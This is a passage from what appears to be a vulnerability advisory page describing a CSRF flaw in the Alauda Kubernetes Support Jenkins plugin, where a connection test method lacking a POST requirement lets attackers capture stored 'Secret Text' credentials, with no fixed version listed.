Cross-Site Request Forgery (CSRF) Affecting io.alauda.jenkins.plugins:alauda-kubernetes-support package, versions [0,]
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.Test your applications
20 Dec 2019
17 Dec 2019
Viktor Gazdag NCC Group
How to fix?
There is no fixed version for
io.alauda.jenkins.plugins:alauda-kubernetes-support is a plugin for Jenkins.
Affected versions of this package are vulnerable to Cross-Site Request Forgery (CSRF). The package does not require POST requests on a connection test method, resulting in a CSRF vulnerability. This allows attackers to have Jenkins connect to Kubernetes-related paths on an attacker-specified web server using attacker-specified credentials IDs obtained through another method, capturing 'Secret Text' credentials stored in Jenkins.
Additionally, if no credentials ID is specified, the connection uses the default Kubernetes token from